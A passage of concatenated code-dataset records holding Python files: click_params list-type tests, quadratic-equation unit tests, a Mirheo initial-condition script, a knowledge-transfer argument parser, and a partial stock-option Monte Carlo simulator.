'c']\\n\"),\n # mac address list\n (\n MacAddressListParamType(),\n 'D4:6A:6A:12:B0:75,01:23:45:67:ab:CD',\n \"['D4:6A:6A:12:B0:75', '01:23:45:67:ab:CD']\\n\",\n ),\n (\n MacAddressListParamType(' '),\n 'D4:6A:6A:12:B0:75 01:23:45:67:ab:CD',\n \"['D4:6A:6A:12:B0:75', '01:23:45:67:ab:CD']\\n\",\n ),\n # uuid list\n (\n UUIDListParamType(),\n 'a7309d0b-c858-4d54-b6e1-1c20f8c22047,bfa65f3c-e6ac-4844-8e09-e84535f8cdc5',\n \"[UUID('a7309d0b-c858-4d54-b6e1-1c20f8c22047'), UUID('bfa65f3c-e6ac-4844-8e09-e84535f8cdc5')]\\n\",\n ),\n (\n UUIDListParamType(' '),\n 'a7309d0b-c858-4d54-b6e1-1c20f8c22047 bfa65f3c-e6ac-4844-8e09-e84535f8cdc5',\n \"[UUID('a7309d0b-c858-4d54-b6e1-1c20f8c22047'), UUID('bfa65f3c-e6ac-4844-8e09-e84535f8cdc5')]\\n\",\n ),\n # datetime list\n (\n DateTimeListParamType(),\n '2019-01-01,2019-01-01 01:00:00',\n '[datetime.datetime(2019, 1, 1, 0, 0), datetime.datetime(2019, 1, 1, 1, 0)]\\n',\n ),\n (\n DateTimeListParamType(', '),\n '2019-01-01, 2019-01-01 01:00:00',\n '[datetime.datetime(2019, 1, 1, 0, 0), datetime.datetime(2019, 1, 1, 1, 0)]\\n',\n ),\n ],\n)\ndef test_should_print_correct_output_when_giving_correct_option_for_list_types(\n runner, parameter, expression, expected_output\n):\n @click.command()\n @click.option('-v', 'values', type=parameter)\n def cli(values):\n click.echo(values)\n\n result = runner.invoke(cli, ['-v', expression])\n\n assert_equals_output(0, expected_output, result)\n\n\n@pytest.mark.parametrize(\n \"param_type\", [StringListParamType, MacAddressListParamType, UUIDListParamType, DateTimeListParamType]\n)\ndef test_miscellaneous_list_param_types_ignore_empty_string(param_type):\n misc_list_type = param_type(ignore_empty=True)\n\n assert misc_list_type.convert(\"\", None, None) == []\n\n\ndef test_cli_with_multiple_similar_string_list_param_types(runner):\n @click.command()\n @click.option('-v', 'values', type=StringListParamType(\",\"))\n def cli(values):\n click.echo(values)\n\n result = runner.invoke(cli, ['-v', \"abc,def\"])\n\n assert result.output == \"['abc', 'def']\\n\"\n\n result = runner.invoke(cli, ['-v', \"abc,def\"])\n\n assert result.output == \"['abc', 'def']\\n\"\n\n\nclass TestJsonParamType:\n \"\"\"Tests JsonParamType specific cases\"\"\"\n\n def test_should_call_json_loads_with_correct_arguments(self, mocker):\n loads_mock = mocker.patch('json.loads')\n json_type = JsonParamType(parse_float=Decimal, parse_int=int, parse_constant=Decimal)\n json_type.convert(2, None, None)\n\n loads_mock.assert_called_once_with(\n 2,\n cls=None,\n object_hook=None,\n parse_float=Decimal,\n parse_int=int,\n parse_constant=Decimal,\n object_pairs_hook=None,\n )\n\n\nclass TestFirstOf:\n \"\"\"Test class FirstOf\"\"\"\n\n def test_class_representation_is_correct(self):\n class CoreNumber(FirstOf):\n name = 'core number'\n\n assert 'CORE NUMBER' == repr(CoreNumber(click.INT, click.Choice(['all', 'half'])))\n assert 'CORE NUMBER' == repr(FirstOf(click.INT, click.Choice(['all', 'half']), name='core number'))\n assert '(INTEGER | CHOICE)' == repr(FirstOf(click.INT, click.Choice(['all', 'half'])))\n\n @pytest.mark.parametrize(\n ('expression', 'param_types', 'value'),\n [\n ('12', (click.INT,), 12),\n ('auto', (click.Choice(['auto', 'full']), click.INT), 'auto'),\n ('full', (click.Choice(['auto', 'full']), click.INT), 'full'),\n ('12', (click.Choice(['auto', 'full']), click.INT), 12),\n ('auto', (click.Choice(['auto', 'full']), click.INT, click.FLOAT), 'auto'),\n ('full', (click.Choice(['auto', 'full']), click.INT, click.FLOAT), 'full'),\n ('12', 
(click.Choice(['auto', 'full']), click.INT, click.FLOAT), 12),\n ('12.3', (click.Choice(['auto', 'full']), click.INT, click.FLOAT), 12.3),\n ],\n )\n def test_should_parse_expression_successfully(self, expression, param_types, value):\n union_type = FirstOf(*param_types)\n converted_value = union_type.convert(expression, None, None)\n assert type(value) == type(converted_value)\n assert value == converted_value\n\n @pytest.mark.parametrize(\n ('expression', 'param_types', 'expected_param_type'),\n [\n ('12', (click.INT,), click.INT),\n ('auto', (click.Choice(['auto', 'full']), click.INT), click.Choice(['auto', 'full'])),\n ('full', (click.Choice(['auto', 'full']), click.INT), click.Choice(['auto', 'full'])),\n ('12', (click.Choice(['auto', 'full']), click.INT), click.INT),\n ('12.3', (click.Choice(['auto', 'full']), click.INT, click.FLOAT), click.FLOAT),\n ],\n )\n def test_should_return_correct_param_type(self, expression, param_types, expected_param_type):\n union_type = FirstOf(*param_types, return_param=True)\n (param_type, _) = union_type.convert(expression, None, None)\n assert repr(expected_param_type) == repr(param_type)\n\n @pytest.mark.parametrize(\n ('expression', 'param_types'),\n [\n ('auto', (click.INT,)),\n ('12.6', (click.Choice(['auto', 'full']), click.INT)),\n ('bla', (click.Choice(['auto', 'full']), click.INT, click.FLOAT)),\n ],\n )\n def test_should_parse_expression_unsuccessfully(self, expression, param_types):\n union_type = FirstOf(*param_types)\n with pytest.raises(click.BadParameter, match=r'.*\\n - '.join(p.name.upper() for p in param_types)):\n union_type.convert(expression, None, None)\n","repo_name":"click-contrib/click_params","sub_path":"tests/test_miscellaneous.py","file_name":"test_miscellaneous.py","file_ext":"py","file_size_in_byte":9355,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"96"} +{"seq_id":"27196661179","text":"## START:\nimport unittest\nfrom Quadratic import QuadraticEquation\nfrom io import StringIO\nimport sys\n\n\ndef studentOutput(someFunc, *args, **kwargs):\n \"\"\"\n Captures the output from student's print statement.\n\n Args:\n someFunc (module): a given function\n *args: additional arguments needed for the function\n **kwargs: additional keyword arguments for the function\n\n Return:\n tuple: A tuple containing the returned value of the function and the printed output.\n \"\"\"\n\n # A new StringIO object is created. 
This is an in-memory file-like object.\n # It can be used as a string buffer which can capture the output.\n capturedOutput = StringIO()\n\n # The standard output is redirected to our `capturedOutput`.\n # This means anything that gets printed will now go to `capturedOutput` instead of the console.\n sys.stdout = capturedOutput\n\n # The function `someFunc` is called with any provided arguments and its output is stored.\n returnedOutput = someFunc(*args, **kwargs)\n\n # Standard output is reset to its default value, so future prints will go to the console.\n sys.stdout = sys.__stdout__\n\n # The content that was \"printed\" to `capturedOutput` is extracted and returned.\n printedOutput = capturedOutput.getvalue().strip()\n\n return (returnedOutput, printedOutput)\n\n\nclass TestQuadraticEquation(unittest.TestCase):\n \"\"\"\n Test suite for the QuadraticEquation class.\n \"\"\"\n\n def test_discriminant(self):\n \"\"\"\n Test the calculation of the discriminant.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, -3, 2)\n # Assert that the discriminant method returns the correct value\n self.assertEqual(equation.discriminant(), 1)\n\n def test_normal_roots(self):\n \"\"\"\n Test case for normal roots.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, -3, 2)\n # Assert that the roots method returns the correct roots\n self.assertEqual(equation.roots(), (2.0, 1.0))\n\n def test_identical_roots(self):\n \"\"\"\n Test case for identical roots.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, 2, 1)\n # Assert that the roots method returns a single root (since they are identical)\n self.assertEqual(equation.roots(), (-1.0))\n\n def test_no_real_roots(self):\n \"\"\"\n Test case for scenarios with no real roots.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, 0, 1)\n # Here we are testing an exception. 
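The manual sys.stdout swap in studentOutput is exactly what contextlib.redirect_stdout packages up, with restoration guaranteed even if the called function raises. A sketch of an equivalent helper:

import contextlib
import io

def captured(func, *args, **kwargs):
    # Run func, return (return value, stripped stdout text), as above.
    buf = io.StringIO()
    with contextlib.redirect_stdout(buf):
        returned = func(*args, **kwargs)
    return returned, buf.getvalue().strip()

print(captured(print, "x^2 - 3x + 2 = 0")[1])  # x^2 - 3x + 2 = 0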
We expect a ValueError to be raised.\n with self.assertRaises(ValueError) as context:\n equation.roots()\n # Further assert that the raised exception has the expected error message.\n self.assertEqual(str(context.exception), \"Discriminant is negative: No real roots.\")\n\n def test_linear_equation(self):\n \"\"\"\n Test case for when a = 0, which means the equation is linear.\n \"\"\"\n\n # We will use a linear equation: 0x^2 + 3x - 2 = 0 or 3x - 2 = 0 for this test.\n equation = QuadraticEquation(0, 3, -2)\n # The root for the linear equation 3x - 2 = 0 is x = 2/3.\n expectedRoot = (2 / 3)\n # Assert the expected and returned values.\n self.assertEqual(equation.roots(), expectedRoot)\n\n def test_linear_no_solution(self):\n \"\"\"\n Test case for when a = 0, b = 0, and c != 0, which means no solution for the linear equation.\n \"\"\"\n\n equation = QuadraticEquation(0, 0, 2)\n\n with self.assertRaises(ValueError) as context:\n equation.roots()\n\n self.assertEqual(str(context.exception), \"The equation has no solution.\")\n\n def test_linear_always_true(self):\n \"\"\"\n Test case for when a = 0, b = 0, and c = 0, which means the equation is always true for all x.\n \"\"\"\n\n equation = QuadraticEquation(0, 0, 0)\n\n with self.assertRaises(ValueError) as context:\n equation.roots()\n\n self.assertEqual(str(context.exception),\n \"The equation is always true for all x.\")\n\n def test_str_representation(self):\n \"\"\"\n Test the informal string representation of the QuadraticEquation.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, -3, 2)\n\n # We assert that the string representation of the equation object matches our expectation\n self.assertEqual(str(equation), \"x^2 - 3x + 2 = 0\")\n\n def test_str_print_output(self):\n \"\"\"\n Test the printed output of the informal string representation.\n \"\"\"\n\n # An instance of QuadraticEquation is created for testing\n equation = QuadraticEquation(1, -3, 2)\n expectedOutput = \"x^2 - 3x + 2 = 0\"\n\n # We utilize the studentOutput function to capture the print output\n printedOutput = studentOutput(print, equation)[1]\n\n # We assert that the captured print output matches our expectation\n self.assertEqual(printedOutput, expectedOutput)\n\n\n# This line ensures the unittests are executed when this script is run.\nif __name__ == \"__main__\":\n unittest.main()\n## END.","repo_name":"migh6544/COMP-3006","sub_path":"Assignments/5/Quadratic_UnitTest.py","file_name":"Quadratic_UnitTest.py","file_ext":"py","file_size_in_byte":5410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42463013735","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport mirheo as mir\n\nranks = (1, 1, 1)\ndomain = [4., 6., 8.]\n\nu = mir.Mirheo(ranks, tuple(domain), debug_level=3, log_filename='log', no_splash=True)\n\npv = mir.ParticleVectors.ParticleVector('pv', mass = 1)\n\npos = [[a*domain[0], a*domain[1], a*domain[2]] for a in [0.1, 0.5, 0.8, 1.5]] # one particle is outside\nv=[1., 2., 3.]\nvel = [[a*v[0], a*v[1], a*v[2]] for a in [0.1, 0.5, 0.8, 1.5]]\n\nic = mir.InitialConditions.FromArray(pos, vel)\nu.registerParticleVector(pv, ic)\n\nu.run(2, dt=0)\n\nif pv:\n icpos = pv.getCoordinates()\n icvel = pv.getVelocities()\n np.savetxt(\"pos.ic.txt\", icpos)\n np.savetxt(\"vel.ic.txt\", icvel)\n \n\n# TEST: ic.fromArray\n# cd ic\n# rm -rf pos*.txt vel*.txt\n# mir.run --runargs \"-n 2\" ./from_array.py\n# paste pos.ic.txt vel.ic.txt | 
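The assertRaises-then-compare-str(context.exception) pattern used throughout these quadratic tests can be collapsed with assertRaisesRegex, which matches the message as a regular expression; a self-contained sketch:

import unittest

class MessageDemo(unittest.TestCase):
    def test_error_message(self):
        # One statement checks both the exception type and its message.
        with self.assertRaisesRegex(ValueError, "No real roots"):
            raise ValueError("Discriminant is negative: No real roots.")

if __name__ == "__main__":
    unittest.main()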
LC_ALL=en_US.utf8 sort > ic.out.txt\n","repo_name":"cselab/Mirheo","sub_path":"tests/ic/from_array.py","file_name":"from_array.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"96"} +{"seq_id":"7422707898","text":"from argparse import ArgumentParser\n\n# ----------------------------------- DEFAULT ARGUMENTS ------------------------------------------\nDATASET_CHOICES = 'cifar10', 'cifar100', 'svhn_cropped', 'fashion_mnist', 'mnist'\nMETHOD = ['distillation', 'pkt', 'pkt+distillation']\nMETHOD_CHOICES = 'distillation', 'pkt', 'pkt+distillation'\nSELECTIVE_LEARNING = False\nTEMPERATURE = 2\nKD_LAMBDA_SUPERVISED = 0.1\nPKT_LAMBDA_SUPERVISED = 1E-4\nK = 5\nKD_IMPORTANCE_WEIGHT = 1\nPKT_IMPORTANCE_WEIGHT = 1\nKEEP_BEST = True\nSAVE_STUDENTS = 'best'\nSAVE_STUDENTS_CHOICES = 'all', 'best', 'none'\nSAVE_RESULTS = True\nRESULTS_NAME_PREFIX = ''\nOUT_FOLDER_NAME = 'out'\nOPTIMIZER = 'adam'\nOPTIMIZER_CHOICES = 'adam', 'rmsprop', 'sgd', 'adagrad', 'adadelta', 'adamax'\nLEARNING_RATE = 1E-3\nLR_PATIENCE = 8\nLR_DECAY = 0.1\nLR_MIN = 1E-8\nEARLY_STOPPING_PATIENCE = 15\nBETA1 = .9\nBETA2 = .999\nRHO = .9\nMOMENTUM = .0\nDECAY = 1E-6\nTRAIN_BATCH_SIZE = 64\nEVAL_BATCH_SIZE = 128\nEPOCHS = 125\nVERBOSITY = 1\nDEBUG = False\nSEED = 0\n\n\n# ------------------------------------------------------------------------------------------------\n\n\ndef create_parser() -> ArgumentParser:\n \"\"\"\n Creates an argument parser for the KT script.\n\n :return: ArgumentParser object.\n \"\"\"\n parser = ArgumentParser(description='Transfer the knowledge between two Neural Networks, '\n 'using different methods and compare the results.')\n parser.add_argument('teacher', type=str, help='Path to a trained teacher network.')\n parser.add_argument('student', type=str, help='Path to a student network to be used.')\n parser.add_argument('dataset', type=str, choices=DATASET_CHOICES, help='The name of the dataset to be used.')\n parser.add_argument('-m', '--method', type=str.lower, nargs='+', default=METHOD, required=False,\n choices=METHOD_CHOICES, help='The KT method(s) to be used. 
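The hand-written "(default %(default)s)" suffix repeated in every help string of the parser below can instead come from argparse itself. A sketch using ArgumentDefaultsHelpFormatter (the option shown is illustrative):

from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter

parser = ArgumentParser(description="demo",
                        formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("-t", "--temperature", type=float, default=2.0,
                    help="The temperature for the distillation.")
print(parser.format_help())  # help line now ends with "(default: 2.0)"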
(default %(default)s).')\n parser.add_argument('-sl', '--selective_learning', default=SELECTIVE_LEARNING, required=False, action='store_true',\n help='Whether the models should be designed for the KT with Selective Learning framework '\n '(default %(default)s).')\n parser.add_argument('-w', '--start_weights', type=str, required=False,\n help='Filepath containing existing weights to initialize the model.')\n parser.add_argument('-t', '--temperature', default=TEMPERATURE, required=False, type=float,\n help='The temperature for the distillation (default %(default)s).')\n parser.add_argument('-kdl', '--kd_lambda_supervised', default=KD_LAMBDA_SUPERVISED, required=False, type=float,\n help='The lambda value for the KD supervised term (default %(default)s).')\n parser.add_argument('-pktl', '--pkt_lambda_supervised', default=PKT_LAMBDA_SUPERVISED, required=False, type=float,\n help='The lambda value for the PKT supervised term (default %(default)s).')\n parser.add_argument('-k', '--neighbors', default=K, required=False, type=int,\n help='The number of neighbors for the PKT method evaluation (default %(default)s).')\n parser.add_argument('-kdw', '--kd_importance_weight', default=KD_IMPORTANCE_WEIGHT, required=False, type=float,\n help='The importance weight for the KD loss, if method is PKT plus KD (default %(default)s).')\n parser.add_argument('-pktw', '--pkt_importance_weight', default=PKT_IMPORTANCE_WEIGHT, required=False, type=float,\n help='The importance weight for the PKT loss, if method is PKT plus KD (default %(default)s).')\n parser.add_argument('-ufm', '--use_final_model', default=not KEEP_BEST, required=False, action='store_true',\n help='Whether the final model should be used for saving and results evaluation '\n 'and not the best one achieved through the training procedure (default %(default)s).')\n parser.add_argument('-s', '--save_students', type=str.lower, default=SAVE_STUDENTS, required=False,\n choices=SAVE_STUDENTS_CHOICES,\n help='The save mode for the final student networks. (default %(default)s).')\n parser.add_argument('-or', '--omit_results', default=not SAVE_RESULTS, required=False, action='store_true',\n help='Whether the KT comparison results should not be saved (default %(default)s).')\n parser.add_argument('-res', '--results_name_prefix', default=RESULTS_NAME_PREFIX, required=False, type=str,\n help='The prefix for the results filenames (default %(default)s).')\n parser.add_argument('-out', '--out_folder', default=OUT_FOLDER_NAME, required=False, type=str,\n help='Path to the folder where the outputs will be stored (default %(default)s).')\n parser.add_argument('-o', '--optimizer', type=str.lower, default=OPTIMIZER, required=False,\n choices=OPTIMIZER_CHOICES,\n help='The optimizer to be used. (default %(default)s).')\n parser.add_argument('-lr', '--learning_rate', type=float, default=LEARNING_RATE, required=False,\n help='The learning rate for the optimizer (default %(default)s).')\n parser.add_argument('-lrp', '--learning_rate_patience', type=int, default=LR_PATIENCE, required=False,\n help='The number of epochs to wait before decaying the learning rate (default %(default)s).')\n parser.add_argument('-lrd', '--learning_rate_decay', type=float, default=LR_DECAY, required=False,\n help='The learning rate decay factor. '\n 'If 0 is given, then the learning rate will remain the same during the training process. 
'\n '(default %(default)s).')\n parser.add_argument('-lrm', '--learning_rate_min', type=float, default=LR_MIN, required=False,\n help='The minimum learning rate which can be reached (default %(default)s).')\n parser.add_argument('-esp', '--early_stopping_patience', type=int, default=EARLY_STOPPING_PATIENCE, required=False,\n help='The number of epochs to wait before early stopping. '\n 'If 0 is given, early stopping will not be applied. (default %(default)s).')\n parser.add_argument('-cn', '--clip_norm', type=float, required=False,\n help='The clip norm for the optimizer (default %(default)s).')\n parser.add_argument('-cv', '--clip_value', type=float, required=False,\n help='The clip value for the optimizer (default %(default)s).')\n parser.add_argument('-b1', '--beta1', type=float, default=BETA1, required=False,\n help='The beta 1 for the optimizer (default %(default)s).')\n parser.add_argument('-b2', '--beta2', type=float, default=BETA2, required=False,\n help='The beta 2 for the optimizer (default %(default)s).')\n parser.add_argument('-rho', type=float, default=RHO, required=False,\n help='The rho for the optimizer (default %(default)s).')\n parser.add_argument('-mm', '--momentum', type=float, default=MOMENTUM, required=False,\n help='The momentum for the optimizer (default %(default)s).')\n parser.add_argument('-d', '--decay', type=float, default=DECAY, required=False,\n help='The decay for the optimizer (default %(default)s).')\n parser.add_argument('-bs', '--batch_size', type=int, default=TRAIN_BATCH_SIZE, required=False,\n help='The batch size for the optimization (default %(default)s).')\n parser.add_argument('-ebs', '--evaluation_batch_size', type=int, default=EVAL_BATCH_SIZE, required=False,\n help='The batch size for the evaluation (default %(default)s).')\n parser.add_argument('-e', '--epochs', type=int, default=EPOCHS, required=False,\n help='The number of epochs to train the network (default %(default)s).')\n parser.add_argument('-v', '--verbosity', type=int, default=VERBOSITY, required=False,\n help='The verbosity for the optimization procedure (default %(default)s).')\n parser.add_argument('--debug', default=DEBUG, required=False, action='store_true',\n help='Whether debug mode should be enabled (default %(default)s).')\n parser.add_argument('-seed', '--seed', type=int, default=SEED, required=False,\n help='The seed for all the random operations. 
Pass a negative number, '\n 'in order to have non-deterministic behavior (default %(default)s).')\n return parser\n\n# TODO use Hydra (https://hydra.cc/) instead.\n","repo_name":"Adamantios/Knowledge-Transfer","sub_path":"utils/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":8832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"29163129234","text":"import urllib, time, os, re, csv\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas_datareader.data as web\nimport datetime as dt\nimport json as js\nimport math\nimport random as rand\nfrom bs4 import BeautifulSoup\nimport pickle\nimport requests\nfrom matplotlib import style\nfrom collections import Counter\n#from sklearn import svm, cross_validation, neighbors\n#from sklearn.ensemble import VotingClassifier, RandomForestClassifier\n\nfrom googlefinance import getQuotes\nfrom yahoo_finance import Share\n\n#******************************************************************************\n#*************************** Functions ****************************************\n#******************************************************************************\n\ndef fetchGF(googleticker):\n \"\"\"\n\n :param googleticker:\n :return:\n \"\"\"\n result = []\n returnedResult = False;\n tryCount = 0\n while not returnedResult:\n try:\n result = getQuotes(\"GE\")\n returnedResult = True\n except:\n time.sleep(60)\n tryCount += 1\n\n return result\n\ndef yhGetHistory(myTicker, start, stop):\n \"\"\"\n Helper function used by getMeData function\n\n myTicker: string ticker symbol\n start: string, format = \"YYYY-M-D\"\n stop: string, format = \"YYYY-M-D\"\n return: list of dictionaries\n \"\"\"\n histList = []\n\n myStock = Share(myTicker)\n myRecord = myStock.get_historical(start, stop)\n\n for i in range(len(myRecord)):\n tempDate = myRecord[i][\"Date\"]\n tempOpen = float(myRecord[i][\"Open\"])\n tempHigh = float(myRecord[i][\"High\"])\n tempLow = float(myRecord[i][\"Low\"])\n tempClose = float(myRecord[i][\"Close\"])\n tempVolume = int(myRecord[i][\"Volume\"])\n tempAdjClose = float(myRecord[i][\"Adj_Close\"])\n\n histList.append({\"Date\" : tempDate, \"Open\" : round(tempOpen, 2), \"High\" : round(tempHigh, 2), \"Low\" : round(tempLow, 2),\n \"Close\" : round(tempClose, 2), \"Volume\" : tempVolume, \"Adj Close\" : round(tempAdjClose, 2)})\n\n return histList\n\ndef getMeData(ticker, start, stop):\n \"\"\"\n Builds a data frame out of data returned by yhGetHistory\n ticker: string stock ticker\n start: string, format = \"YYYY-M-D\"\n stop: string, format = \"YYYY-M-D\"\n return df: data frame with Date, Open, Close, Volume\n \"\"\"\n\n colOrder = [\"Date\", \"Open\", \"High\", \"Low\", \"Close\", \"Volume\", \"Adj Close\"]\n\n myData = yhGetHistory(ticker, start, stop)\n myDF = pd.DataFrame(myData)\n myDF = myDF[colOrder]\n myDF.set_index([\"Date\"], inplace = True)\n myDF.sort_index(ascending = True, inplace = True)\n\n return myDF\n\ndef altGetMeData(ticker, start, stop):\n \"\"\"\n Works very sporadically\n :param ticker:\n :param start:\n :param stop:\n :return:\n \"\"\"\n df = web.DataReader(ticker, 'yahoo', start, stop)\n return df\n\ndef getMeStats(df):\n \"\"\"\n Calculates the daily price change of the underlyings price data and then calculates the mean, median and\n standard deviation of the daily price change.\n df: dataframe of stock data\n return: mean, median, standard deviation (tuple) of change and dataframe with new columns 
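The while-loop in fetchGF above retries forever and, despite its googleticker parameter, always queries the hard-coded "GE". A sketch of the same retry idea with a bounded attempt budget; the quoted usage assumes getQuotes is importable as in the script:

import time

def retry(func, attempts=5, wait_seconds=1.0):
    # Try, sleep, retry; re-raise once the attempt budget is exhausted.
    for attempt in range(attempts):
        try:
            return func()
        except Exception:
            if attempt == attempts - 1:
                raise
            time.sleep(wait_seconds)

print(retry(lambda: 42))  # usage: retry(lambda: getQuotes(googleticker))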
(Change, 20D_MA, 50D_MA,\n and 100D_MA)\n \"\"\"\n temp = df[\"Close\"]\n temp = temp.diff()\n df[\"Change\"] = temp\n df[\"20D_MA\"] = df[\"Close\"].rolling(window = 20, min_periods = 0).mean()\n df[\"50D_MA\"] = df[\"Close\"].rolling(window = 50, min_periods = 0).mean()\n df[\"100D_MA\"] = df[\"Close\"].rolling(window = 100, min_periods = 0).mean()\n df.drop(df.index[0], inplace = True)\n mu = round(np.mean(df[\"Change\"]), 3)\n med = round(np.median(df[\"Change\"]), 3)\n s = round(np.std(df[\"Change\"]), 3)\n\n return (mu, med, s), df\n\ndef runExcerciseTrial(myClass, myStats, priceAtEntry, numDays, numTrials):\n trialData = []\n for i in range(numTrials):\n samples = np.random.normal(myStats[0], myStats[2], numDays)\n sumSamples = round(np.sum(samples), 2)\n finalPrice = priceAtEntry + sumSamples\n trialData.append(myClass.inMoney(finalPrice))\n\n return round((np.sum(trialData)/numTrials), 3)\n\ndef runPriceTrial(myStats, priceAtPurchase, numDays, numTrials, optionLegs):\n \"\"\"\n Simulates a single/multi leg option trade. Samples from a normal distribution with the mean and std of the\n change data of the underlying are picked. The number of samples are given by numDays. The samples are summed and added\n to the price of the underlying when the trade was entered. The resulting price is the underlyings price at the end of the trade.\n The end price is passed to the findPL method of each leg, the results are added to find the value of the overall trade.\n\n myStats: mean, median, and standard deviation of \"Change\" of the underlying\n priceAtPurchase: underlying's price at entry into the trade\n numDays: number of days in the trade\n numTrials: number of times to run the trial\n optionLegs: a list of instantions of option objects\n return: list of option chain P/L at the end of the number of days in the trial(i.e. 
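A self-contained sketch of the statistics getMeStats derives, on toy closes. Note that pandas' Series.std defaults to the sample deviation (ddof=1) while the script's np.std is the population figure, so ddof=0 is passed to match:

import pandas as pd

close = pd.Series([10.0, 10.5, 10.2, 10.8, 11.0])  # toy closing prices
change = close.diff().dropna()                      # daily price change
print(round(change.mean(), 3), round(change.median(), 3),
      round(change.std(ddof=0), 3))                 # 0.25 0.35 0.35
print(close.rolling(window=3, min_periods=1).mean().round(3).tolist())
# [10.0, 10.25, 10.233, 10.5, 10.667]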
sums of P/Ls of each leg)\n \"\"\"\n trialData = []\n for i in range(numTrials): #iterate over the number of trials\n samples = np.random.normal(myStats[0], myStats[2], numDays)\n sumSamples = round(np.sum(samples), 2)\n finalPrice = priceAtPurchase + sumSamples\n\n temp = 0\n for j in range(len(optionLegs)): #iterate over option legs\n temp += round(optionLegs[j].findPL(finalPrice), 2)\n\n trialData.append(temp)\n\n return trialData\n\n# def plotOption(start, stop, myClass, myClass1 = None, myClass2 = None, myClass3 = None):\n# \"\"\"\n# Calculate the value of an option or multi-leg option versus the price of the underlying\n#\n# start: price of underlying to start analysis at\n# stop: price of underlying to stop analysis at\n# myClass: object of type of callOption or putOption\n# myClass1: optional 2nd leg\n# myClass2: optional 3rd leg\n# myClass3: optional 4th leg\n# return: two lists; first is price of underlying, second is value of option\n# \"\"\"\n# xData = []\n# yData = []\n# for i in range(start, stop):\n# xData.append(i)\n# if (myClass1 is None) and (myClass2 is None) and (myClass3 is None):\n# yData.append(myClass.findPL(i))\n# elif (myClass2 is None) and (myClass3 is None):\n# yData.append(myClass.findPL(i) + myClass1.findPL(i))\n# elif (myClass3 is None):\n# yData.append(myClass.findPL(i) + myClass1.findPL(i) + myClass2.findPL(i))\n# else:\n# yData.append(myClass.findPL(i) + myClass1.findPL(i) + myClass2.findPL(i) + myClass3.findPL(i))\n#\n# # plt.plot(xData, yData)\n# # plt.show()\n# return xData, yData\n\ndef plotOption(start, stop, optionLegs):\n \"\"\"\n Calculate the value of an option or multi-leg option chain over a range of the underlying's price\n\n start: price of underlying to start analysis at\n stop: price of underlying to stop analysis at\n optionLegs: a list of instantions of option objects\n return: two lists; first is price of underlying, second is value of option\n \"\"\"\n xData = []\n yData = []\n for i in np.arange(start, stop, (stop - start)/100): #iterate over price\n xData.append(i)\n temp = 0\n for j in range(len(optionLegs)): #iterate over option legs\n temp += optionLegs[j].findPL(i)\n\n yData.append(temp)\n\n return xData, yData\n\ndef buildSimulateChain():\n \"\"\"\n The user enters data to build an option chain which is then simulated. First each leg of the chain is simulated to\n look at the probability that it will close above the strike price for a range of the underlying's price centered\n about its price when the trade was entered. Second the trade is simulated to show the probability of final yields\n at expiration.\n\n return: null, results appear as graphs\n \"\"\"\n\n yes = [\"YES\", \"Yes\", \"yes\", \"Y\", \"y\"]\n no = [\"NO\", \"No\", \"no\", \"N\", \"n\"]\n call = [\"Call\", \"call\", \"CALL\", \"c\", \"C\"]\n put = [\"Put\", \"put\", \"PUT\", \"p\", \"P\"]\n ticker = \"\"\n\n decision = input(\"Do you want to analyze an option chain? \")\n if decision in yes:\n # enter basic data\n with open(\"sp500tickers.pickle\", \"rb\") as f:\n tickers = pickle.load(f)\n while ticker == \"\":\n ticker = (input(\"Please tell me the TICKER of underlying \")).upper()\n if ticker not in tickers:\n print(\"Sorry that doesn't seem to be a valid ticker symbol\\n\")\n ticker = \"\"\n\n priceAtEntry = float(input(\"Please tell me its current price? \"))\n\n decision = input(\"Do you want to load new historical price data? 
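runPriceTrial's per-trial Python loop can be drawn in one shot; a sketch of the same final-price simulation vectorized with numpy (the parameter values below are illustrative):

import numpy as np

def simulate_final_prices(mu, sigma, price_at_entry, num_days, num_trials, seed=0):
    # One (num_trials, num_days) normal draw replaces num_trials separate
    # draws; each row sums to one trial's cumulative price change.
    rng = np.random.default_rng(seed)
    steps = rng.normal(mu, sigma, size=(num_trials, num_days))
    return price_at_entry + steps.sum(axis=1)

final = simulate_final_prices(0.01, 0.3, 30.0, num_days=20, num_trials=10_000)
print(round(final.mean(), 2))  # close to 30.2 = 30 + 20 * 0.01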
\")\n if decision in yes:\n myDF = getMeData(ticker, \"2016-1-2\", \"2017-3-27\")\n myDF.to_csv(ticker + \"csv\")\n myStats, _ = getMeStats(myDF)\n else:\n myDF = pd.read_csv(ticker + \".csv\", parse_dates=True, index_col=0)\n myStats, _ = getMeStats(myDF)\n\n numDays = int(input(\"How many DAYS are left until expiration? \"))\n numTrials = int(input(\"How many TRIALS do you want to do for each data point? \"))\n\n # enter option leg data\n enterAnother = \"y\"\n legs = list()\n while (enterAnother in yes):\n optionType = input(\"What TYPE of option do you want, Put or Call? \")\n buySell = input(\"Are you BUYING the options? \")\n if buySell in yes:\n buyOption = True\n else:\n buyOption = False\n optionQty = float(input(\"HOW MANY options do you want? \"))\n strikePrice = round(float(input(\"What is the STRIKE price of the option? \")), 2)\n purchasePrice = round(float(input(\"What is the PURCHASE price of the option? \")), 2)\n fee = float(input(\"What is the FEE to buy or sell? \"))\n\n if optionType in call:\n legs.append(callOption(purchasePrice, fee, strikePrice, optionQty, buyOption))\n else:\n legs.append(putOption(purchasePrice, fee, strikePrice, optionQty, buyOption))\n\n enterAnother = input(\"Do you want to add another leg to the option chain? \")\n\n\n # Plot the probability of each legs price being above(below) the strike price after 